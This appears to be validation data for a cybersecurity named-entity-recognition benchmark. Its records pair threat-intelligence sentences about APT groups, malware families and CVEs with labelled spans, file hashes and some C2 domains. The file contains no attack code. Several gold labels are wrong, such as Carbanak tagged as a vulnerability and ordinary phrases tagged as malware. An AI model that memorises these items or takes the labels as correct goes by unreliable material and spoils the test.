Sensitive bank documents have be found on the servers that were controlling Carbanak .", "spans": {"Malware: Carbanak": [[209, 217]]}, "info": {"id": "cyberner_stix_valid_000035", "source": "cyberner_stix_valid"}} {"text": "CTU researchers observed RCSession and Cobalt Strike on systems that BRONZE PRESIDENT targeted for data theft .", "spans": {"Organization: CTU": [[0, 3]], "Malware: RCSession": [[25, 34]]}, "info": {"id": "cyberner_stix_valid_000036", "source": "cyberner_stix_valid"}} {"text": "Like EternalPetya , infpub.dat determines if a specific file exists on the system and will exit if found . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER .", "spans": {"Malware: infpub.dat": [[20, 30]], "Malware: specific file": [[47, 60]], "Vulnerability: CVE-2017-11882": [[191, 205]], "Malware: POWRUNER": [[216, 224]], "Malware: BONDUPDATER": [[229, 240]]}, "info": {"id": "cyberner_stix_valid_000037", "source": "cyberner_stix_valid"}} {"text": "PLATINUM has developed or commissioned a number of custom tools to provide the group with access to victim resources . Since at least 2013 , Nitro appears to have somewhat modified their malware and delivery methods to include Spindest and legitimate compromised websites , as reported by Cyber Squared 's TCIRT .", "spans": {"Malware: Spindest": [[227, 235]], "Malware: legitimate compromised websites": [[240, 271]], "Organization: Cyber Squared 's TCIRT": [[289, 311]]}, "info": {"id": "cyberner_stix_valid_000038", "source": "cyberner_stix_valid"}} {"text": "NetSess — This publicly available tool enumerates NetBIOS sessions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000039", "source": "cyberner_stix_valid"}} {"text": "This would allow the RAT to receive system notifications . In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials . 
On August 25, 2014, we observed another round of spear phishing emails targeting a high-technology company in Japan . Proxy : Domain Fronting APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.007 Remote Services : Cloud Services APT29 has leveraged compromised high - privileged on - premises accounts synced to Office 365 to move laterally into a cloud environment , including through the use of Azure AD PowerShell .", "spans": {"System: Remote Services": [[416, 431]], "System: Azure AD PowerShell": [[617, 636]]}, "info": {"id": "cyberner_stix_valid_000040", "source": "cyberner_stix_valid"}} {"text": "EventBot parsing of grabbed SMS messages Parsing of grabbed SMS messages . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . APT33 often conducts spear-phishing operations using a built-in phishing module .", "spans": {"Malware: EventBot": [[0, 8]], "Malware: Sea Turtle": [[142, 152]]}, "info": {"id": "cyberner_stix_valid_000041", "source": "cyberner_stix_valid"}} {"text": "Vector : The delivery mechanism ; email via attacker-controlled or leased spam botnet -- Necurs for TA505 -- remains a dominant vector , and certainly the vector of choice for this actor .", "spans": {"Malware: Necurs": [[89, 95]]}, "info": {"id": "cyberner_stix_valid_000042", "source": "cyberner_stix_valid"}} {"text": "( You can find additional IoCs at the end of this article ) As you can see , the Web page uses a similar colour scheme as , and the icon design from , a legitimate VPN application ( VPN Proxy Master ) found on the Google Play store . It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations . 
Splitter.exe : a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff , 1ff40e79d673461cd33bd8b68f8bb5b8 , 2017.08.06 11:32:36 (GMT), I386 Windows Console EXE . We highly suspect the “ Pig network ” to have also been used as a bulletproof hosting service for cybercriminals who are unrelated to the Winnti group .", "spans": {"System: Google Play store": [[214, 231]], "Indicator: Splitter.exe": [[512, 524]], "Indicator: a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff": [[527, 591]], "Indicator: 1ff40e79d673461cd33bd8b68f8bb5b8": [[594, 626]], "System: Windows": [[661, 668]], "System: Pig network": [[707, 718]], "System: bulletproof hosting service": [[749, 776]]}, "info": {"id": "cyberner_stix_valid_000043", "source": "cyberner_stix_valid"}} {"text": "The malware may inject itself into browser processes and explorer.exe . BARIUM begins its attacks by cultivating relationships with potential victims—particularly those working in Business Development or Human Resources—on various social media platforms .", "spans": {"Malware: explorer.exe": [[57, 69]], "Organization: social media": [[231, 243]]}, "info": {"id": "cyberner_stix_valid_000044", "source": "cyberner_stix_valid"}} {"text": "Explanation of ToolTo improve social engineering assessments , we developed a tool – named ReelPhish – that simplifies the real-time phishing technique . 
Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb .", "spans": {"Indicator: IDA Pro": [[169, 176]], "Indicator: WinDbg": [[181, 187]]}, "info": {"id": "cyberner_stix_valid_000045", "source": "cyberner_stix_valid"}} {"text": "The implications of this study shows that certificate owners need to keep a careful eye on them to prevent them from falling into the wrong hands .", "spans": {}, "info": {"id": "cyberner_stix_valid_000046", "source": "cyberner_stix_valid"}} {"text": "We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content .", "spans": {"Malware: decoy files": [[14, 25]], "Indicator: archive": [[148, 155]], "Vulnerability: vulnerability": [[216, 229]]}, "info": {"id": "cyberner_stix_valid_000047", "source": "cyberner_stix_valid"}} {"text": "The group ’s primary malware is Sofacy , which has two main components .", "spans": {"Malware: Sofacy": [[32, 38]]}, "info": {"id": "cyberner_stix_valid_000048", "source": "cyberner_stix_valid"}} {"text": "Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . The sample we analyzed was a purported message from a police inspector in Zurich allegedly claiming to unsuccessfully contact the recipient .", "spans": {"Malware: HIGHNOON": [[22, 30]]}, "info": {"id": "cyberner_stix_valid_000049", "source": "cyberner_stix_valid"}} {"text": "Kaspersky detects and blocks samples of the ViceLeaker operation using the following verdict : Trojan-Spy.AndroidOS.ViceLeaker . 
Based on our analysis into the activity , ASERT deems with moderate confidence that an Indian APT group is behind the LUCKY ELEPHANT campaign . Dropper : 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273 Excel file with malicious macro .", "spans": {"Organization: Kaspersky": [[0, 9]], "Malware: ViceLeaker": [[44, 54]], "Malware: Dropper": [[273, 280]], "Indicator: 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273": [[283, 347]]}, "info": {"id": "cyberner_stix_valid_000050", "source": "cyberner_stix_valid"}} {"text": "These decoy documents however were written before the start of the November 2013 Euromaidan protests in Ukraine and the subsequent upheaval .", "spans": {}, "info": {"id": "cyberner_stix_valid_000051", "source": "cyberner_stix_valid"}} {"text": "Comparing encrypted vs decrypted asset file . In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . 
This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics .", "spans": {"Vulnerability: CVE-2019-0604": [[121, 134]], "Organization: Cyber Security Center": [[187, 208]], "Organization: Canadian Center": [[217, 232]], "Malware: SYSCON": [[378, 384]], "Indicator: malicious Word documents": [[413, 437]]}, "info": {"id": "cyberner_stix_valid_000052", "source": "cyberner_stix_valid"}} {"text": "It injects the next payload into the Internet Explorer process , and the tainted iexplore.exe process carries out the attacker ’s commands .", "spans": {"Indicator: iexplore.exe": [[81, 93]]}, "info": {"id": "cyberner_stix_valid_000053", "source": "cyberner_stix_valid"}} {"text": "Officials did confirm a few days later that they were a victim of malicious cyber-attacks that prevented attendees from printing their tickets to the Games and televisions and internet access in the main press center simply stopped working .", "spans": {"Organization: Games": [[150, 155]]}, "info": {"id": "cyberner_stix_valid_000054", "source": "cyberner_stix_valid"}} {"text": "Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February . These archives provide further indication that those entities behind the campaigns are Persian-language speakers , due to the naming of files and folders in Persian .", "spans": {"Organization: customers": [[92, 101]], "Organization: IT support firms": [[112, 128]]}, "info": {"id": "cyberner_stix_valid_000055", "source": "cyberner_stix_valid"}} {"text": "To do this , open the displayed link on your mobile phone by typing in the URL field of your browser or scan the displayed QR code . 
These actors use Let's Encrypt , Comodo , Sectigo , and self-signed certificates in their MitM servers to gain the initial round of credentials . The group has targeted organizations across multiple industries in the United States , Saudi Arabia , and South Korea , with a particular interest in the aviation and energy sectors .", "spans": {}, "info": {"id": "cyberner_stix_valid_000056", "source": "cyberner_stix_valid"}} {"text": "The legitimate app in question was a Uyghur language keyboard app targeted at native speakers of the Uyghur language and their smartphones . The link to feeds.rapidfeeds.com left in its XML configuration file was also mentioned by Kaspersky’s report in the reference section , which confirms that the APT-C-09 group keeps updating its C2 configuration channel and the recent one reserves some past features . The use of BLACKCOFFEE demonstrates APT17 's evolving use of public websites to hide in plain sight .", "spans": {"Organization: Kaspersky’s": [[231, 242]], "Malware: BLACKCOFFEE": [[420, 431]]}, "info": {"id": "cyberner_stix_valid_000057", "source": "cyberner_stix_valid"}} {"text": "] 204 [ . The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term \" MiniDuke \" to identify the first Duke-related malware they found . The loop then looks for the method name DownloadData , and if located will download a resource from a second C2 . 
On July 15th , Facebook revealed it tracked and partially disrupted a long-running Iranian attack campaign that used accounts to pose as recruiters and draw in US targets before sending them malware-infected files or tricking them into entering sensitive credentials to phishing sites .", "spans": {"Organization: Kaspersky Labs": [[90, 104]], "Organization: Facebook": [[319, 327]]}, "info": {"id": "cyberner_stix_valid_000058", "source": "cyberner_stix_valid"}} {"text": "This report shares our researchers ’ analysis of the attack and Remote Access Tool ( RAT ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000059", "source": "cyberner_stix_valid"}} {"text": "BOT UPDATES EventBot has a long method called parseCommand that can update EventBot ’ s configuration XML files , located in the shared preferences folder on the device . Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources . The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files .", "spans": {"Malware: EventBot": [[12, 20], [75, 83]], "Malware: attacks": [[176, 183]], "Malware: SHAPESHIFT wiper": [[317, 333]]}, "info": {"id": "cyberner_stix_valid_000060", "source": "cyberner_stix_valid"}} {"text": "Once an application has been identified , Anubis overlays the original application with a fake login page to capture the user ’ s credentials . In the first attack , Butterfly gained a foothold by first attacking a small European office belonging to one firm and using this infection to then move on to its US office and European headquarters . All of the aforementioned groups greatly benefit from unpatched systems in corporate environments . 
The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": {"Malware: Anubis": [[42, 48]]}, "info": {"id": "cyberner_stix_valid_000061", "source": "cyberner_stix_valid"}} {"text": "To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Once a victim is confirmed as \" interesting \" , the attackers upload another Epic backdoor which has a unique ID used to control this specific victim .", "spans": {"Vulnerability: Carbanak": [[91, 99]], "Malware: Epic backdoor": [[227, 240]]}, "info": {"id": "cyberner_stix_valid_000062", "source": "cyberner_stix_valid"}} {"text": "The attackers used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia .", "spans": {"Indicator: Bisonal malware": [[245, 260]]}, "info": {"id": "cyberner_stix_valid_000063", "source": "cyberner_stix_valid"}} {"text": "When the self-extracting archive file is executed , it will drop two files .", "spans": {}, "info": {"id": "cyberner_stix_valid_000064", "source": "cyberner_stix_valid"}} {"text": "With the capability to open market applications , such as Google Play and 9Apps , with a specific keyword search or even a single application ’ s page , the actor can gain exposure for other threat actors and increase his profits . During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort . 
While tracking what days of the week Suckfly used its hacktools , we discovered that the group was only active Monday through Friday .", "spans": {"System: Google Play": [[58, 69]], "System: 9Apps": [[74, 79]], "Malware: hacktools": [[487, 496]]}, "info": {"id": "cyberner_stix_valid_000065", "source": "cyberner_stix_valid"}} {"text": "History has shown us that , in time , these attacks will use zero-day vulnerabilities , exploits or a combination of techniques . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . Recently we were able to observe these actors making modifications to their Clayslide delivery documents in an attempt to evade antivirus detection .", "spans": {"Vulnerability: zero-day vulnerabilities": [[61, 85]], "Vulnerability: Niteris exploit": [[175, 190]], "Organization: banks": [[233, 238]], "Malware: Clayslide delivery documents": [[421, 449]]}, "info": {"id": "cyberner_stix_valid_000066", "source": "cyberner_stix_valid"}} {"text": "Analysis of TG-3390 's operations , targeting , and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China .", "spans": {"Organization: CTU": [[62, 65]], "Organization: People's Republic": [[141, 158]]}, "info": {"id": "cyberner_stix_valid_000067", "source": "cyberner_stix_valid"}} {"text": "A Slice of 2017 Sofacy Activity .", "spans": {}, "info": {"id": "cyberner_stix_valid_000068", "source": "cyberner_stix_valid"}} {"text": "Although multi-step overlays are not something new , their usage is generally limited to avoid raising suspicion . 
A series of standards lay out CIA malware infestation patterns which are likely to assist forensic crime scene investigators as well as Apple , Microsoft , Google , Samsung , Nokia , Blackberry , Siemens and anti-virus companies attribute and defend against attacks . DragonOK is a threat group that has targeted Japanese organizations with phishing emails .", "spans": {"Organization: Apple": [[251, 256]], "Organization: Microsoft": [[259, 268]], "Organization: Google": [[271, 277]], "Organization: Samsung": [[280, 287]], "Organization: Nokia": [[290, 295]], "Organization: Blackberry": [[298, 308]], "Organization: Siemens": [[311, 318]], "Organization: anti-virus companies": [[323, 343]], "Organization: organizations": [[437, 450]]}, "info": {"id": "cyberner_stix_valid_000069", "source": "cyberner_stix_valid"}} {"text": "For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 .", "spans": {"Malware: %TEMP%\\flash_update.exe": [[179, 202]], "Indicator: decoy slideshow": [[260, 275]]}, "info": {"id": "cyberner_stix_valid_000070", "source": "cyberner_stix_valid"}} {"text": "However , this is not a genuine “ Google Play Protect ” screen ; instead it gives the app all the permissions it needs while simultaneously disabling the actual Google Play Protect . The first signs of Butterfly 's activities emerged in early 2013 when several major technology and internet firms were compromised . We link the AveMaria botnet to these two groups with medium confidence : AveMaria ’s targets are mostly suppliers for big companies , and the way AveMaria manages its infrastructure is very similar to FIN7 . 
Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": {"System: Google Play": [[34, 45]], "System: Google Play Protect": [[161, 180]], "Organization: technology": [[267, 277]], "Organization: internet firms": [[282, 296]], "Malware: AveMaria": [[328, 336], [389, 397], [462, 470]], "Malware: FakeUpdates": [[591, 602]], "Malware: SocGholish": [[619, 629]]}, "info": {"id": "cyberner_stix_valid_000071", "source": "cyberner_stix_valid"}} {"text": "The dropped file was determined as modified version of njRAT trojan .", "spans": {"Malware: njRAT trojan": [[55, 67]]}, "info": {"id": "cyberner_stix_valid_000072", "source": "cyberner_stix_valid"}} {"text": "It is a powerful , multi-featured RAT that lets a threat actor take total control over a machine . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party .", "spans": {"Organization: government agencies": [[204, 223]], "Organization: Fatah political party": [[232, 253]]}, "info": {"id": "cyberner_stix_valid_000073", "source": "cyberner_stix_valid"}} {"text": "Once the malware has been executed , it checks to see if it has a connection to the internet before running .", "spans": {}, "info": {"id": "cyberner_stix_valid_000074", "source": "cyberner_stix_valid"}} {"text": "Advanced Malware Protection ( AMP ) is ideally suited to prevent the execution of the malware used by these threat actors . The Machete group is very active and has introduced several changes to its malware since a new version was released in April 2018 . 
From November 2015 through the end of 2016 , APT38 was involved in at least nine separate compromises against banks .", "spans": {"System: Advanced Malware Protection ( AMP )": [[0, 35]], "Organization: banks": [[366, 371]]}, "info": {"id": "cyberner_stix_valid_000075", "source": "cyberner_stix_valid"}} {"text": "] it Bologna server3ct.exodus.connexxa [ . XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts . Dfff0a7fa1a55c8c1a4966c19f6da452 : cmd . 51a7a76a7dd5d9e4651fe3d4c74d16d6 : downloadfile . 62c92ba585f74ecdbef4c4498a438984 : screenshot . First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": {"Indicator: Dfff0a7fa1a55c8c1a4966c19f6da452": [[233, 265]], "Indicator: 51a7a76a7dd5d9e4651fe3d4c74d16d6": [[274, 306]], "Indicator: 62c92ba585f74ecdbef4c4498a438984": [[324, 356]], "Malware: OT malware": [[401, 411]]}, "info": {"id": "cyberner_stix_valid_000076", "source": "cyberner_stix_valid"}} {"text": "AlarmReceiver - Triggers every three minutes . DoublePulsar was delivered to victims using a custom exploit tool (Trojan.Bemstour) that was specifically designed to install DoublePulsar . A group known by Microsoft as NEODYMIUM is Oreportedly associated closely with BlackOasis operations , but evidence that the group names are aliases has not been identified .", "spans": {"Organization: Microsoft": [[205, 214]]}, "info": {"id": "cyberner_stix_valid_000077", "source": "cyberner_stix_valid"}} {"text": "CapabilitiesFormBook is a data stealer , but not a full-fledged banker . 
Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers .", "spans": {"Organization: CapabilitiesFormBook": [[0, 20]], "Organization: banker": [[64, 70]], "Organization: Talos": [[73, 78]], "Organization: government": [[185, 195]]}, "info": {"id": "cyberner_stix_valid_000078", "source": "cyberner_stix_valid"}} {"text": "Access to targets' Google accounts allows TG-4127 to review internal emails and potentially access other Google Apps services used by these organizations , such as Google Drive .", "spans": {"Organization: Google": [[19, 25], [105, 111], [164, 170]]}, "info": {"id": "cyberner_stix_valid_000079", "source": "cyberner_stix_valid"}} {"text": "] info including the “ bankaustria ” brand . The first group , we identify as primary victims , includes national security organizations , ministries of foreign affairs , and prominent energy organizations . Patchwork : Dropping Elephant , Chinastrats , MONSOON , Operation Hangover .", "spans": {"Organization: national security organizations": [[105, 136]], "Organization: ministries": [[139, 149]], "Organization: prominent energy organizations": [[175, 205]]}, "info": {"id": "cyberner_stix_valid_000080", "source": "cyberner_stix_valid"}} {"text": "Figure 6 . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER . This RAT is a good example of how a highly focused attack that tries to blend its network traffic into the crowd can be highly effective . Copies of the site at archive.org show it was the work of someone calling themselves “ The Chaos Creator . 
”", "spans": {"Vulnerability: Microsoft Office vulnerability": [[64, 94]], "Vulnerability: CVE-2017-11882": [[95, 109]]}, "info": {"id": "cyberner_stix_valid_000081", "source": "cyberner_stix_valid"}} {"text": "Just don ’ t forget that the scan does not run automatically in the free version . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region .", "spans": {"Malware: sample": [[229, 235]], "Vulnerability: CVE-2017-11882": [[255, 269]], "Vulnerability: CVE-2018-0802": [[273, 286]]}, "info": {"id": "cyberner_stix_valid_000082", "source": "cyberner_stix_valid"}} {"text": "Firstly , the Dukes may have been confident enough in their own abilities ( and in the slowness of their opponents to react to new threats ) that they did not care if their targets may already be on the lookout for anyone exploiting these vulnerabilities .", "spans": {}, "info": {"id": "cyberner_stix_valid_000083", "source": "cyberner_stix_valid"}} {"text": "The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . 
We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover .", "spans": {"Malware: tool": [[4, 8]], "Malware: SNEEPY/BYEBYESHELL": [[282, 300]], "Indicator: CONFUCIUS_B": [[309, 320]], "Malware: Hangover": [[342, 350]]}, "info": {"id": "cyberner_stix_valid_000084", "source": "cyberner_stix_valid"}} {"text": "File Name Modified Date SHA256 null_arm 2018-02-27 06:44:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 null_i686 2018-02-27 06:44:00 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 null_arm64 2018-02-27 06:43:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 Our data suggests that actors have deployed the RGDoor backdoor on webservers belonging to eight Middle Eastern government organizations , as well as one financial and one educational institution . At this time , the API key is revoked and the Twitter account is suspended . Analysis of memory core dump files", "spans": {"Organization: government organizations": [[428, 452]], "Organization: financial": [[470, 479]], "Organization: educational institution": [[488, 511]]}, "info": {"id": "cyberner_stix_valid_000085", "source": "cyberner_stix_valid"}} {"text": "The attachment itself is an Microsoft Excel XLS document that contains malicious macro script .", "spans": {"Organization: Microsoft": [[28, 37]]}, "info": {"id": "cyberner_stix_valid_000086", "source": "cyberner_stix_valid"}} {"text": "Keep in mind that while this case is about TANs , it can be any OTP , depending on which bank is being targeted . The threat actor attempted to compromise critical assets , such as database servers , billing servers , and the active directory . 
Inspecting the class C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain , msoffice-cdn.com which we identified in August 2017 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000087", "source": "cyberner_stix_valid"}} {"text": "Device information : EventBot queries for device information like OS , model , etc , and also sends that to the C2 . We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 . Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with connections to foreign investors .", "spans": {"Malware: EventBot": [[21, 29]], "Malware: Okrum backdoor": [[176, 190]], "Malware: Ketrican backdoor": [[210, 227]], "Organization: network security": [[304, 320]], "Organization: technology infrastructure corporations": [[325, 363]]}, "info": {"id": "cyberner_stix_valid_000088", "source": "cyberner_stix_valid"}} {"text": "While OSX_DOK.C is designed for MAC S-OS OS X , which is a Unix-like system , WERDLOD is designed for Windows .", "spans": {"Malware: OSX_DOK.C": [[6, 15]], "Malware: WERDLOD": [[78, 85]], "System: Windows": [[102, 109]]}, "info": {"id": "cyberner_stix_valid_000089", "source": "cyberner_stix_valid"}} {"text": "Allows an application to send SMS messages . Wikileaks has carefully reviewed the Year Zero disclosure and published substantive CIA documentation while avoiding the distribution of 'armed' cyberweapons until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed , disarmed and published . 
They have extensively used strategic web compromises to compromise victims .", "spans": {"Organization: Wikileaks": [[45, 54]]}, "info": {"id": "cyberner_stix_valid_000090", "source": "cyberner_stix_valid"}} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe .", "spans": {"Malware: malicious Microsoft Word document": [[90, 123]], "Vulnerability: CVE-2012-0158": [[143, 156]], "Indicator: malware": [[231, 238]], "Indicator: BS2005 backdoors": [[282, 298]], "Indicator: TidePool malware": [[342, 358]], "Organization: Palo Alto": [[380, 389]]}, "info": {"id": "cyberner_stix_valid_000091", "source": "cyberner_stix_valid"}} {"text": "SEADUKE : First known activity October 2014 , Most recent known activity Spring 2015 , Other names SeaDaddy , SeaDask , C&C communication methods HTTP(S) , Known toolset components Backdoor .", "spans": {"Malware: SEADUKE": [[0, 7]], "Malware: SeaDaddy": [[99, 107]], "Malware: SeaDask": [[110, 117]], "Malware: C&C": [[120, 123]]}, "info": {"id": "cyberner_stix_valid_000092", "source": "cyberner_stix_valid"}} {"text": "We encourage Android users to validate whether their accounts have been breached . BRONZE BUTLER uses credential theft tools such as Mimikatz and WCE to steal authentication information from the memory of compromised hosts . the code was modified to catch and pass the mblock_t of the jnz instruction to the sub-instruction . 
For instance , Rising Sun was observed in attacks before the discovery of ' Sharpshooter ' and shared the tactics , techniques , and procedures ( TTPs ) seen in operations attributed to Lazarus group .", "spans": {"System: Android": [[13, 20]], "System: Sharpshooter": [[402, 414]]}, "info": {"id": "cyberner_stix_valid_000093", "source": "cyberner_stix_valid"}} {"text": "One of these [ CVE-2015-5119 ] was a Flash zero-day . The organised crime group started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world . The guessing is not 100% accurate however it works for the majority of obfuscated functions tested . Duqu uses a custom command and control protocol that communicates over commonly used ports , and is frequently encapsulated by application layer protocols.[5 ]", "spans": {"Vulnerability: CVE-2015-5119": [[15, 28]], "Organization: financial institutions": [[230, 252]]}, "info": {"id": "cyberner_stix_valid_000094", "source": "cyberner_stix_valid"}} {"text": "Attackers can send SMS with certain messages to activate the agent and trigger corresponding action . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . The analyst is then required to resolve the correct next block and modify the destination accordingly . 
The group also engaged in the theft of digital certificates which they then used to sign their malware to make them stealthier .", "spans": {"Vulnerability: Carbanak": [[193, 201]]}, "info": {"id": "cyberner_stix_valid_000095", "source": "cyberner_stix_valid"}} {"text": "Suckfly paints a stark picture of where cyberattack groups and cybercriminals are focusing their attentions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000096", "source": "cyberner_stix_valid"}} {"text": "January 23 , 2017 SpyNote RAT posing as Netflix app As users have become more attached to their mobile devices , they want everything on those devices . Silence also started using Ivoke , a fileless loader , and EDA agent , both written in PowerShell . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies .", "spans": {"Malware: SpyNote RAT": [[18, 29]], "System: Netflix app": [[40, 51]], "Malware: Carbanak": [[325, 333]], "Organization: financial industry": [[350, 368]], "Organization: payment providers": [[379, 396]], "Organization: retail industry": [[399, 414]], "Organization: PR companies": [[419, 431]]}, "info": {"id": "cyberner_stix_valid_000097", "source": "cyberner_stix_valid"}} {"text": "This technique reminds us of a combination between ages old war strategies “ Divide et impera ” and “ By way of deception ” . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . 
Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": {"Malware: RTF files": [[171, 180]], "Vulnerability: CVE-2017-8570": [[192, 205]], "Organization: oil": [[402, 405]], "Organization: gas": [[408, 411]], "Organization: petrochemical companies": [[418, 441]], "Organization: executives": [[471, 481]]}, "info": {"id": "cyberner_stix_valid_000098", "source": "cyberner_stix_valid"}} {"text": "The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . There are new TTPs used in this attack – for example Agent_Drable is leveraging the Django Python framework for command and control infrastructure , the technical details of which are outlined later in the blog .", "spans": {"Malware: Sea Turtle": [[67, 77]], "Malware: Django": [[219, 225]]}, "info": {"id": "cyberner_stix_valid_000099", "source": "cyberner_stix_valid"}} {"text": "Although most apps have positive ratings , some of the users have noticed and reported Judy ’ s suspicious activities , as seen in the images below : As seen in previous malware , such as DressCode , a high reputation does not necessarily indicate that the app is safe for use . ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system . When the connection is established a new thread is spawned that starts with the MainConnectionIo function . 
The leaked Biderman emails show that Harrison made good on his threats , and that in the months that followed Harrison began targeting Biderman and other Ashley Madison executives with menacing anonymous emails and spoofed phone calls laced with profanity and anti - Semitic language .", "spans": {"Malware: Judy": [[87, 91]], "Malware: DressCode": [[188, 197]], "Organization: Biderman": [[650, 658]], "Organization: Ashley Madison executives": [[669, 694]]}, "info": {"id": "cyberner_stix_valid_000100", "source": "cyberner_stix_valid"}} {"text": "In addition , the use of shared-hosting providers adds flexibility to the threat actor ’ s campaign and makes it harder for defending parties to track these moving targets . We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 . The filename is also randomly generated based on a dictionary $ARRAY[5]=[\"prc\" ,\"winrar\" ,\"chrome\" ,\"sync\" ,\"COM surr\"] . LockBit reportedly squeezed about $ 91 million out of US organizations with around 1,700 attacks since 2020 , according to a June report by CISA .", "spans": {"Malware: ThreeDollars document": [[257, 278]], "Organization: US organizations": [[509, 525]], "Organization: CISA": [[595, 599]]}, "info": {"id": "cyberner_stix_valid_000101", "source": "cyberner_stix_valid"}} {"text": "However , Brazilian actors commonly use several methods to do so , such as reselling cards they have created , paying bills with stolen cards in return for a portion of the bill's value and reselling illicitly obtained goods . 
